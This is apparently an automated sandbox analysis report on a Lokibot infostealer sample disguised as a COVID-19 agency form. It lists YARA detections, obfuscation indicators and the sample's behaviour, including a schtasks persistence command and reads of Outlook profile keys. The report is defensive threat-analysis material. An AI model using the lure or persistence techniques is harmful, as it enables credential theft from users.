                Source: 6.2.RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
                Source: 0.2.RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe.3896a98.1.unpack, type: UNPACKEDPEMatched rule: Loki Payload Author: kevoreilly
                Source: 0.2.RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe.3896a98.1.unpack, type: UNPACKEDPEMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
                Source: 00000000.00000002.222223728.00000000027EF000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
                Source: 00000000.00000002.222793737.00000000037D9000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
                Source: 00000006.00000002.237286267.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Loki Payload Author: kevoreilly
                Source: 00000006.00000002.237286267.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
                Initial sample is a PE file and has a suspicious nameShow sources
                Source: initial sampleStatic PE information: Filename: RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeCode function: 0_2_00B8E560
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeCode function: 0_2_00B8E558
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeCode function: 0_2_00B8BCB4
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeCode function: 0_2_04CF7770
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeCode function: 0_2_04CFB198
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeCode function: 0_2_04CFA2A8
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeCode function: 0_2_04CF1808
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeCode function: 0_2_04CF1807
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeCode function: 0_2_04CF1A5F
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeCode function: 0_2_04CF1A60
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeCode function: 6_2_0040549C
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeCode function: 6_2_004029D4
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeCode function: String function: 0041219C appears 45 times
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeCode function: String function: 00405B6F appears 42 times
                Source: RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                Source: RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                Source: RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                Source: qvDFOnW.exe.0.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                Source: qvDFOnW.exe.0.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                Source: qvDFOnW.exe.0.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                Source: RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe, 00000000.00000002.221579092.0000000000B9B000.00000004.00000020.sdmpBinary or memory string: OriginalFilenameclr.dllT vs RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe
                Source: RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe, 00000000.00000002.229005900.0000000007110000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameSparselyPopulated.dll@ vs RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe
                Source: RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe, 00000000.00000002.228871654.0000000006E70000.00000002.00000001.sdmpBinary or memory string: OriginalFilenamemscorrc.dllT vs RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe
                Source: RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe, 00000000.00000002.229926575.000000000EBB0000.00000002.00000001.sdmpBinary or memory string: System.OriginalFileName vs RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe
                Source: RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe, 00000000.00000002.230426036.000000000ECA0000.00000002.00000001.sdmpBinary or memory string: originalfilename vs RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe
                Source: RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe, 00000000.00000002.230426036.000000000ECA0000.00000002.00000001.sdmpBinary or memory string: OriginalFilenamepropsys.dll.mui@ vs RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe
                Source: RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe, 00000000.00000002.221241977.00000000003B6000.00000002.00020000.sdmpBinary or memory string: OriginalFilenameInt16ArrayTypeInfo.exe: vs RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe
                Source: RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe, 00000000.00000002.229331155.0000000009270000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameRelativeFileUrl.dllL vs RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe
                Source: RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe, 00000006.00000000.220566722.0000000000886000.00000002.00020000.sdmpBinary or memory string: OriginalFilenameInt16ArrayTypeInfo.exe: vs RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe
                Source: RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeBinary or memory string: OriginalFilenameInt16ArrayTypeInfo.exe: vs RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe
                Source: RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeStatic PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED
                Source: 6.2.RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
                Source: 6.2.RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
                Source: 0.2.RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe.3896a98.1.raw.unpack, type: UNPACKEDPEMatched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, reference = https://twitter.com/stvemillertime/status/1237035794973560834, score = , modified = 2021-05-27
                Source: 0.2.RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe.3896a98.1.raw.unpack, type: UNPACKEDPEMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
                Source: 0.2.RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe.3896a98.1.raw.unpack, type: UNPACKEDPEMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
                Source: 6.2.RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
                Source: 6.2.RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
                Source: 0.2.RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe.3896a98.1.unpack, type: UNPACKEDPEMatched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, reference = https://twitter.com/stvemillertime/status/1237035794973560834, score = , modified = 2021-05-27
                Source: 0.2.RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe.3896a98.1.unpack, type: UNPACKEDPEMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
                Source: 0.2.RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe.3896a98.1.unpack, type: UNPACKEDPEMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
                Source: 00000000.00000002.222223728.00000000027EF000.00000004.00000001.sdmp, type: MEMORYMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
                Source: 00000000.00000002.222793737.00000000037D9000.00000004.00000001.sdmp, type: MEMORYMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
                Source: 00000006.00000002.237286267.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
                Source: 00000006.00000002.237286267.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
                Source: RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe, gZCsHhk6LU0YnGpPZF/QfRWq82JToxowssZ5I.csCryptographic APIs: 'CreateDecryptor'
                Source: RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe, gZCsHhk6LU0YnGpPZF/QfRWq82JToxowssZ5I.csCryptographic APIs: 'CreateDecryptor'
                Source: qvDFOnW.exe.0.dr, gZCsHhk6LU0YnGpPZF/QfRWq82JToxowssZ5I.csCryptographic APIs: 'CreateDecryptor'
                Source: qvDFOnW.exe.0.dr, gZCsHhk6LU0YnGpPZF/QfRWq82JToxowssZ5I.csCryptographic APIs: 'CreateDecryptor'
                Source: 0.2.RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe.2d0000.0.unpack, gZCsHhk6LU0YnGpPZF/QfRWq82JToxowssZ5I.csCryptographic APIs: 'CreateDecryptor'
                Source: 0.2.RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe.2d0000.0.unpack, gZCsHhk6LU0YnGpPZF/QfRWq82JToxowssZ5I.csCryptographic APIs: 'CreateDecryptor'
                Source: 0.0.RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe.2d0000.0.unpack, gZCsHhk6LU0YnGpPZF/QfRWq82JToxowssZ5I.csCryptographic APIs: 'CreateDecryptor'
                Source: 0.0.RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe.2d0000.0.unpack, gZCsHhk6LU0YnGpPZF/QfRWq82JToxowssZ5I.csCryptographic APIs: 'CreateDecryptor'
                Source: 6.2.RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe.7a0000.1.unpack, gZCsHhk6LU0YnGpPZF/QfRWq82JToxowssZ5I.csCryptographic APIs: 'CreateDecryptor'
                Source: 6.2.RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe.7a0000.1.unpack, gZCsHhk6LU0YnGpPZF/QfRWq82JToxowssZ5I.csCryptographic APIs: 'CreateDecryptor'
                Source: 6.0.RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe.7a0000.0.unpack, gZCsHhk6LU0YnGpPZF/QfRWq82JToxowssZ5I.csCryptographic APIs: 'CreateDecryptor'
                Source: 6.0.RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe.7a0000.0.unpack, gZCsHhk6LU0YnGpPZF/QfRWq82JToxowssZ5I.csCryptographic APIs: 'CreateDecryptor'
                Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@6/6@0/1
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeCode function: 6_2_0040650A LookupPrivilegeValueW,AdjustTokenPrivileges,
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeCode function: 6_2_0040434D CoInitialize,CoCreateInstance,VariantInit,SysAllocString,VariantInit,VariantInit,SysAllocString,VariantInit,SysFreeString,SysFreeString,CoUninitialize,
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeFile created: C:\Users\user\AppData\Roaming\qvDFOnW.exeJump to behavior
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeMutant created: \Sessions\1\BaseNamedObjects\jwmgAWN
                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4244:120:WilError_01
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeMutant created: \Sessions\1\BaseNamedObjects\8F9C4E9C79A3B52B3F739430
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeFile created: C:\Users\user\AppData\Local\Temp\tmp4A8A.tmpJump to behavior
                Source: RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                Source: RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe, 00000000.00000002.222186252.00000000027D1000.00000004.00000001.sdmpBinary or memory string: Select * from Clientes WHERE id=@id;;
                Source: RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe, 00000000.00000002.222186252.00000000027D1000.00000004.00000001.sdmpBinary or memory string: Select * from Aluguel Erro ao listar Banco sql-Aluguel.INSERT INTO Aluguel VALUES(@clienteID, @data);
                Source: RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe, 00000000.00000002.222186252.00000000027D1000.00000004.00000001.sdmpBinary or memory string: Select * from SecurityLogonType WHERE id=@id;
                Source: RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe, 00000000.00000002.222186252.00000000027D1000.00000004.00000001.sdmpBinary or memory string: Select * from SecurityLogonType WHERE modelo=@modelo;
                Source: RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe, 00000000.00000002.222186252.00000000027D1000.00000004.00000001.sdmpBinary or memory string: INSERT INTO Itens_Aluguel VALUES(@aluguelID, @aviaoID, @validade);
                Source: RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe, 00000000.00000002.222186252.00000000027D1000.00000004.00000001.sdmpBinary or memory string: Insert into Clientes values (@nome, @cpf, @rg, @cidade, @endereco, @uf, @telefone);
                Source: RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe, 00000000.00000002.222186252.00000000027D1000.00000004.00000001.sdmpBinary or memory string: INSERT INTO Aluguel VALUES(@clienteID, @data);
                Source: RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe, 00000000.00000002.222186252.00000000027D1000.00000004.00000001.sdmpBinary or memory string: INSERT INTO SecurityLogonType VALUES(@modelo, @fabricante, @ano, @cor);
                Source: RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe, 00000000.00000002.222186252.00000000027D1000.00000004.00000001.sdmpBinary or memory string: Select * from SecurityLogonType*Erro ao listar Banco sql-SecurityLogonType,Select * from SecurityLogonType WHERE id=@id;Select * from SecurityLogonType WHERE (modelo LIKE @modelo)
                Source: RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeVirustotal: Detection: 34%
                Source: RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeReversingLabs: Detection: 19%
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeFile read: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeJump to behavior
                Source: unknownProcess created: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe 'C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe'
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeProcess created: C:\Windows\SysWOW64\schtasks.exe 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\qvDFOnW' /XML 'C:\Users\user\AppData\Local\Temp\tmp4A8A.tmp'
                Source: C:\Windows\SysWOW64\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeProcess created: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeProcess created: C:\Windows\SysWOW64\schtasks.exe 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\qvDFOnW' /XML 'C:\Users\user\AppData\Local\Temp\tmp4A8A.tmp'
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeProcess created: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{95E15D0A-66E6-93D9-C53C-76E6219D3341}\InProcServer32
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook
                Source: RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                Source: RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeStatic file information: File size 1109504 > 1048576
                Source: RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT

                Data Obfuscation:

                barindex
                .NET source code contains method to dynamically call methods (often used by packers)Show sources
                Source: RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe, gZCsHhk6LU0YnGpPZF/QfRWq82JToxowssZ5I.cs.Net Code: stackVariable1.GetMethod("GetDelegateForFunctionPointer", V_0)
                Source: qvDFOnW.exe.0.dr, gZCsHhk6LU0YnGpPZF/QfRWq82JToxowssZ5I.cs.Net Code: stackVariable1.GetMethod("GetDelegateForFunctionPointer", V_0)
                Source: 0.2.RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe.2d0000.0.unpack, gZCsHhk6LU0YnGpPZF/QfRWq82JToxowssZ5I.cs.Net Code: stackVariable1.GetMethod("GetDelegateForFunctionPointer", V_0)
                Source: 0.0.RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe.2d0000.0.unpack, gZCsHhk6LU0YnGpPZF/QfRWq82JToxowssZ5I.cs.Net Code: stackVariable1.GetMethod("GetDelegateForFunctionPointer", V_0)
                Source: 6.2.RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe.7a0000.1.unpack, gZCsHhk6LU0YnGpPZF/QfRWq82JToxowssZ5I.cs.Net Code: stackVariable1.GetMethod("GetDelegateForFunctionPointer", V_0)
                Source: 6.0.RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe.7a0000.0.unpack, gZCsHhk6LU0YnGpPZF/QfRWq82JToxowssZ5I.cs.Net Code: stackVariable1.GetMethod("GetDelegateForFunctionPointer", V_0)
                Yara detected aPLib compressed binaryShow sources
                Source: Yara matchFile source: 6.2.RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe.3896a98.1.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 6.2.RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe.3896a98.1.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000000.00000002.222223728.00000000027EF000.00000004.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.222793737.00000000037D9000.00000004.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000006.00000002.237286267.0000000000400000.00000040.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe PID: 5708, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe PID: 3704, type: MEMORY
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeCode function: 0_2_002D8EC7 push es; retn 0000h
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeCode function: 0_2_00B8C148 push cs; ret
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeCode function: 0_2_00B8B42A push es; ret
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeCode function: 0_2_00B89F93 push es; ret
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeCode function: 0_2_04CF6DE7 push eax; iretd
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeCode function: 0_2_04CF6DFF push ecx; iretd
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeCode function: 0_2_04CF6DF3 push ebx; iretd
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeCode function: 0_2_04CF6EDF push ebx; iretd
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeCode function: 0_2_04CF6E8F push edi; iretd
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeCode function: 0_2_04CF6E93 push edx; iretd
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeCode function: 0_2_04CF6EAF push edi; iretd
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeCode function: 0_2_04CF6EAB push ebp; iretd
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeCode function: 0_2_04CF6EB3 pushad ; iretd
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeCode function: 0_2_04CF6E6F pushad ; iretd
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeCode function: 0_2_04CF6E0F push edx; iretd
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeCode function: 0_2_04CF6E3F push ebp; iretd
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeCode function: 0_2_04CF6E37 push edi; iretd
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeCode function: 0_2_04CF5634 push cs; retf
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeCode function: 0_2_04CF6E33 push edi; iretd
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeCode function: 0_2_04CF6FEB push edx; iretd
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeCode function: 0_2_04CF6FE7 push esp; iretd
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeCode function: 0_2_04CF6F8F push ds; iretd
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeCode function: 0_2_04CF6F9B push eax; iretd
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeCode function: 0_2_04CF6FAB push ebp; iretd
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeCode function: 0_2_04CF6F53 push ebx; iretd
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeCode function: 0_2_04CF6F6F push ebp; iretd
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeCode function: 0_2_04CF6F07 push edx; iretd
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeCode function: 0_2_04CF6F17 push edi; iretd
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeCode function: 0_2_04CF6F2F push ecx; iretd
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeCode function: 0_2_04CF6F27 push esp; iretd
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeCode function: 0_2_04CF6F3B push eax; iretd
                Source: RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe, CMGEZR8d9sV5or5oCT/OTcwV6T8vLYWOKgwix.csHigh entropy of concatenated method names: '.cctor', 'z9ydY6ER8D', 'FCxdQipVZb', 'sLIdIBTMRo', 'oJGdLVFE43', 'xpxdRyHYFN', 'JhBdaUM7SO', 'lEhdijSmdY', 'UF0dB3uwFK', 'MUUdtwqgtF'
                Source: RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe, gZCsHhk6LU0YnGpPZF/QfRWq82JToxowssZ5I.csHigh entropy of concatenated method names: '.cctor', 'hYKDNVuThr0tR', 'cgQZr4MJH9', 'Tv6Z1evBw9', 'g6cZzJCx19', 'mlB6gleQlU', 'do86dVGMDT', 'y8A6xbswHg', 'eNy6ZoenxX', 'mNr660NRAv'
                Source: RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe, dbnXlqp7dn8caOjpkD/KESKfVUYeSsL3MMKqs.csHigh entropy of concatenated method names: '.ctor', 'Dispose', 'yYtdls8T6v', 'o9UEip5rjI', 'pRBEBVI2li', 'NKFEtCIav9', 'dc8EnLMpuG', 'xeRECMRGVv', 'cvDEslt5eo', 'GwLE4lsLUu'
                Source: RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe, ML3LFDD5R0VNWJw5lq/tnkGD7lgAPwn8VbqeW.csHigh entropy of concatenated method names: '.cctor', 'Lr6dZPdt2B', 'l7id665cu9', 'IDmdEHUkYO', '.ctor', 'L6udAJ5vKq', 'Vj7dh8Lfmh', 'aJPdVvf5Ct', 'MGxd3JujLd', 'fVHdGVMDKg'
                Source: RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe, DuH5yrQLwuUs0REMlG/o3WxudYdqIOp1ISAbO.csHigh entropy of concatenated method names: '.ctor', 'rNHxXx8GlM', 'h0dx9X893a', 'fiSxO8vkhK', 'GKTxjQub0Z', 'tQXx1O9BHS', 'a2mxzf0Cd6', 'AuLZdcIDkE', 'HLkZxajJHh', 'BLNZ6vg9lE'
                Source: RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe, D0aORlo8jsHpwwwlBi/fo3uqgS19djuIhRc4J.csHigh entropy of concatenated method names: '.cctor', '.ctor', 'OTcPwV68v', 'uYWJOKgwi', 'UsVH5or5o', 'ATL0WsxgF', 'oXxmDmxVc', 'q2fwxV4UD', 'QddqqIOp1', 'tSAfbOPuH'
                Source: qvDFOnW.exe.0.dr, CMGEZR8d9sV5or5oCT/OTcwV6T8vLYWOKgwix.csHigh entropy of concatenated method names: '.cctor', 'z9ydY6ER8D', 'FCxdQipVZb', 'sLIdIBTMRo', 'oJGdLVFE43', 'xpxdRyHYFN', 'JhBdaUM7SO', 'lEhdijSmdY', 'UF0dB3uwFK', 'MUUdtwqgtF'
